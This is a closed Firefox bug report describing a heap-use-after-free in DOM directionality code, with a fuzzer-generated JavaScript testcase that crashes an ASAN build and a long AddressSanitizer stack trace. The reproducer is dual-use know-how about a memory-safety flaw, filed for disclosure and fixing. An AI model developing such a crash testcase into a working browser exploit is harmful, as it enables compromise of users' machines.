Bug 1360893 (Closed) - heap-use-after-free in mozilla::WalkAncestorsResetAutoDirection
Opened 8 years ago; closed 8 years ago
Categories: Core :: DOM: Core & HTML, defect
Status: RESOLVED DUPLICATE of bug 1346590
People: Reporter: nils, Assigned: smaug
Details: 4 keywords; Attachments: 2 files
The following testcase crashes the latest ASAN build of Firefox:
<script>
function start() {
  o0 = document;
  o2 = document.body;
  o4 = document.documentElement;
  o5 = document.createRange();
  o6 = getSelection();
  o12 = document.createElement('marquee');
  o12.appendChild(o4);
  o20 = document.createElement('bdi');
  o5.surroundContents(o20);
  o80 = document.createElement('marquee');
  o80.addEventListener('DOMAttrModified', fun0);
  document.documentElement.appendChild(o80);
  o85 = document.createElement('form');
  o0.documentElement.appendChild(o85);
}
var c = 0;
function fun0() {
  c++;
  if (c == 1) {
    o116 = document.createElement('head');
    o0.documentElement.appendChild(o116);
    o117 = document.createElement('style');
    o116.appendChild(o117);
    o80.setAttribute('height', '8388608vmax');
    o131 = document.createElement('input');
  } else if (c == 3) {
    o80.id = 'id24';
    document.documentElement.appendChild(o131);
    document.documentElement.style.transform = 'scale(0.0001)';
    document.documentElement.animate([{}, {}], 20);
    // fuzzer-only helper: forces a cycle collection (the nsCycleCollector frames in the "freed by" stack below)
    fuzzPriv.CC();
    document.documentElement.appendChild(o116);
  } else if (c == 4) {
    o0.designMode = 'on';
    o2.style.position = 'fixed';
    o85.appendChild(o131);
    document.documentElement.appendChild(o2);
    o131.type = 'submit';
    o116.after(undefined);
    o6.modify('move', 'forward', 'character');
    document.documentElement.setAttribute('dir', 'auto');
  }
}
</script>
<body onload="start()">
</body>
=================================================================
==8773==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d0004220e0 at pc 0x7fca5647c270 bp 0x7ffcdc1449f0 sp 0x7ffcdc1449e8
READ of size 4 at 0x60d0004220e0 thread T0
#0 0x7fca5647c26f in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1603:12
#1 0x7fca5647c26f in HasTextNodeDirectionalityMap /home/worker/workspace/build/src/dom/base/nsINode.h:1690
#2 0x7fca5647c26f in RemoveElementFromMap /home/worker/workspace/build/src/dom/base/DirectionalityUtils.cpp:556
#3 0x7fca5647c26f in mozilla::WalkAncestorsResetAutoDirection(mozilla::dom::Element*, bool) /home/worker/workspace/build/src/dom/base/DirectionalityUtils.cpp:666
#4 0x7fca56480bb9 in mozilla::SetDirOnBind(mozilla::dom::Element*, nsIContent*) /home/worker/workspace/build/src/dom/base/DirectionalityUtils.cpp:999:7
#5 0x7fca5649384a in mozilla::dom::Element::BindToTree(nsIDocument*, nsIContent*, nsIContent*, bool) /home/worker/workspace/build/src/dom/base/Element.cpp:1604:5
#6 0x7fca587fcb7e in nsGenericHTMLElement::BindToTree(nsIDocument*, nsIContent*, nsIContent*, bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:480:43
#7 0x7fca58786659 in mozilla::dom::HTMLSharedElement::BindToTree(nsIDocument*, nsIContent*, nsIContent*, bool) /home/worker/workspace/build/src/dom/html/HTMLSharedElement.cpp:286:39
#8 0x7fca56769866 in nsINode::doInsertChildAt(nsIContent*, unsigned int, bool, nsAttrAndChildArray&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1608:14
#9 0x7fca5676ffb0 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2510:14
#10 0x7fca56de4429 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1825:12
#11 0x7fca56de4429 in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1829
#12 0x7fca56de4429 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle<JSObject*>, nsINode*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:856
#13 0x7fca5804afde in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
#14 0x7fca5d841aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#15 0x7fca5d841aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#16 0x7fca5d82a64f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#17 0x7fca5d82a64f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
#18 0x7fca5d8105a8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#19 0x7fca5d841c28 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#20 0x7fca5d842452 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#21 0x7fca5e1d717b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
#22 0x7fca57aadb37 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#23 0x7fca5840ba5f in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
#24 0x7fca5840ba5f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134
#25 0x7fca5840d863 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
#26 0x7fca583ee40a in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:488:14
#27 0x7fca583f1522 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:825:9
#28 0x7fca583c072a in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:894:12
#29 0x7fca567679f1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1337:5
#30 0x7fca5839930b in mozilla::AsyncEventDispatcher::Run() /home/worker/workspace/build/src/dom/events/AsyncEventDispatcher.cpp:54:12
#31 0x7fca562c82ef in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5407:15
#32 0x7fca56679883 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5092:3
#33 0x7fca5883bcac in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2495:15
#34 0x7fca5a230efd in ~mozAutoDocConditionalContentUpdateBatch /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:83:18
#35 0x7fca5a230efd in ModifyDeclaration<(lambda at /home/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:346:5), (lambda at /home/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:352:5)> /home/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:338
#36 0x7fca5a230efd in nsDOMCSSDeclaration::ParsePropertyValue(nsCSSPropertyID, nsAString const&, bool) /home/worker/workspace/build/src/layout/style/nsDOMCSSDeclaration.cpp:345
#37 0x7fca56b71c4d in SetWidth /home/worker/workspace/build/src/layout/style/nsCSSPropList.h:4461:1
#38 0x7fca56b71c4d in mozilla::dom::CSS2PropertiesBinding::set_width(JSContext*, JS::Handle<JSObject*>, nsDOMCSSDeclaration*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:44519
#39 0x7fca5804a87c in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2922:8
#40 0x7fca5d841aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#41 0x7fca5d841aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#42 0x7fca5d8437b9 in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:515:12
#43 0x7fca5d8437b9 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534
#44 0x7fca5d8437b9 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:663
#45 0x7fca5e71b906 in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2432:10
#46 0x7fca5e71b906 in js::NativeSetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::QualifiedBool, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2467
#47 0x7fca5e41fa7a in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1459:12
#48 0x7fca5e41fa7a in js::SetPropertyIgnoringNamedGetter(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::PropertyDescriptor>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/BaseProxyHandler.cpp:182
#49 0x7fca58055f24 in mozilla::dom::DOMProxyHandler::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) const /home/worker/workspace/build/src/dom/bindings/DOMJSProxyHandler.cpp:258:10
#50 0x7fca5e451873 in js::Proxy::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:384:21
#51 0x7fca5e33dc8d in JSObject::nonNativeSetProperty(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/jsobj.cpp:1049:12
#52 0x7fca5d82368e in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1458:16
#53 0x7fca5d82368e in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:244
#54 0x7fca5d82368e in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2816
#55 0x7fca5d8105a8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#56 0x7fca5d841c28 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#57 0x7fca5d842452 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#58 0x7fca5e1d52f3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2832:12
#59 0x7fca5993a236 in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3426:14
#60 0x7fca5993a236 in nsXBLProtoImplAnonymousMethod::Execute(nsIContent*, JSAddonId*) /home/worker/workspace/build/src/dom/xbl/nsXBLProtoImplMethod.cpp:331
#61 0x7fca5990548e in nsXBLBinding::ExecuteAttachedHandler() /home/worker/workspace/build/src/dom/xbl/nsXBLBinding.cpp:623:19
#62 0x7fca5990529c in nsBindingManager::ProcessAttachedQueueInternal(unsigned int) /home/worker/workspace/build/src/dom/xbl/nsBindingManager.cpp:424:16
#63 0x7fca5a49defd in ProcessAttachedQueue /home/worker/workspace/build/src/dom/xbl/nsBindingManager.h:105:5
#64 0x7fca5a49defd in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4179
#65 0x7fca5a4138b8 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/nsIPresShell.h:599:5
#66 0x7fca5a4138b8 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1823
#67 0x7fca5a41c82e in WillRefresh /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2167:5
#68 0x7fca5a41c82e in non-virtual thunk to nsRefreshDriver::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2162
#69 0x7fca5a412465 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1789:12
#70 0x7fca5a41be9c in nsRefreshDriver::FinishedWaitingForTransaction() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2088:5
#71 0x7fca55cb5a17 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:517:30
#72 0x7fca55d9267b in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&, unsigned long const&, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:588:8
#73 0x7fca5515a8a6 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1590:20
#74 0x7fca54b6e4f4 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2019:25
#75 0x7fca54b6b387 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1954:17
#76 0x7fca54b6d094 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1823:5
#77 0x7fca54b6d6c6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1856:15
#78 0x7fca53de94f0 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1270:14
#79 0x7fca53de5f38 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:393:10
#80 0x7fca54b764c1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#81 0x7fca54ad99c0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
#82 0x7fca54ad99c0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
#83 0x7fca54ad99c0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
#84 0x7fca59d7734f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
#85 0x7fca5d1c14d1 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:30
#86 0x7fca5d38154e in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4540:22
#87 0x7fca5d382efa in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4720:8
#88 0x7fca5d3840ec in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4813:21
#89 0x4eb3c3 in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22
#90 0x4eb3c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:307
#91 0x7fca6f54f82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
#92 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)
0x60d0004220e0 is located 48 bytes inside of 136-byte region [0x60d0004220b0,0x60d000422138)
freed by thread T0 here:
#0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
#1 0x7fca53c95f57 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:25
#2 0x7fca53c95b57 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2840:3
#3 0x7fca53c9bfd0 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3841:3
#4 0x7fca53c9b7f1 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3663:9
#5 0x7fca53c9e4d5 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4199:21
#6 0x7fca56783d3c in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1451:3
#7 0x7fca5630234d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1341:3
#8 0x7fca53e038a1 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:129
#9 0x7fca5549ae5b in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1996:12
#10 0x7fca5549ae5b in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1315
#11 0x7fca5549ae5b in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
#12 0x7fca554a1f3f in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:982:12
#13 0x7fca5d841aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#14 0x7fca5d841aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#15 0x7fca5d82a64f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#16 0x7fca5d82a64f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
#17 0x7fca5d8105a8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#18 0x7fca5d841c28 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#19 0x7fca5d842452 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#20 0x7fca5e1d52f3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2832:12
#21 0x7fca553c48fb in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
#22 0x7fca5d841aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#23 0x7fca5d841aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#24 0x7fca5d82a64f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#25 0x7fca5d82a64f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
#26 0x7fca5d8105a8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#27 0x7fca5d841c28 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#28 0x7fca5d842452 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#29 0x7fca5e1d717b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
#30 0x7fca57aadb37 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#31 0x7fca5840ba5f in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
#32 0x7fca5840ba5f in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1134
#33 0x7fca5840d863 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1311:20
#34 0x7fca583ee40a in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:488:14
#35 0x7fca583f1522 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:825:9
#36 0x7fca583c072a in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:894:12
previously allocated by thread T0 here:
#0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
#1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7fca5a96eaae in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7fca5a96eaae in nsGfxButtonControlFrame::CreateAnonymousContent(nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/forms/nsGfxButtonControlFrame.cpp:63
#4 0x7fca5a96f54f in non-virtual thunk to nsGfxButtonControlFrame::CreateAnonymousContent(nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/forms/nsGfxButtonControlFrame.cpp:57:26
#5 0x7fca5a51f96e in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray<nsIAnonymousContentCreator::ContentInfo>&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4232:26
#6 0x7fca5a51347a in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11119:3
#7 0x7fca5a52890a in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&, nsFrameConstructorState&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4087:9
#8 0x7fca5a5331e2 in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&, nsContainerFrame*, nsFrameItems&) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6269:3
#9 0x7fca5a540ec5 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10900:5
#10 0x7fca5a540ec5 in nsCSSFrameConstructor::ContentAppended(nsIContent*, nsIContent*, bool, bool, TreeMatchContext*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7730
#11 0x7fca5a4a0f0e in ContentAppended /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.h:245:5
#12 0x7fca5a4a0f0e in mozilla::PresShell::ContentAppended(nsIDocument*, nsIContent*, nsIContent*, int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4408
#13 0x7fca567b308e in nsNodeUtils::ContentAppended(nsIContent*, nsIContent*, int) /home/worker/workspace/build/src/dom/base/nsNodeUtils.cpp:167:3
#14 0x7fca567698a2 in nsINode::doInsertChildAt(nsIContent*, unsigned int, bool, nsAttrAndChildArray&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1627:7
#15 0x7fca5676ffb0 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2510:14
#16 0x7fca56de4429 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1825:12
#17 0x7fca56de4429 in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1829
#18 0x7fca56de4429 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle<JSObject*>, nsINode*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:856
#19 0x7fca5804afde in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
#20 0x7fca5d841aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#21 0x7fca5d841aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
#22 0x7fca5d82a64f in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
#23 0x7fca5d82a64f in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
#24 0x7fca5d8105a8 in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
#25 0x7fca5d841c28 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
#26 0x7fca5d842452 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
#27 0x7fca5e1d717b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
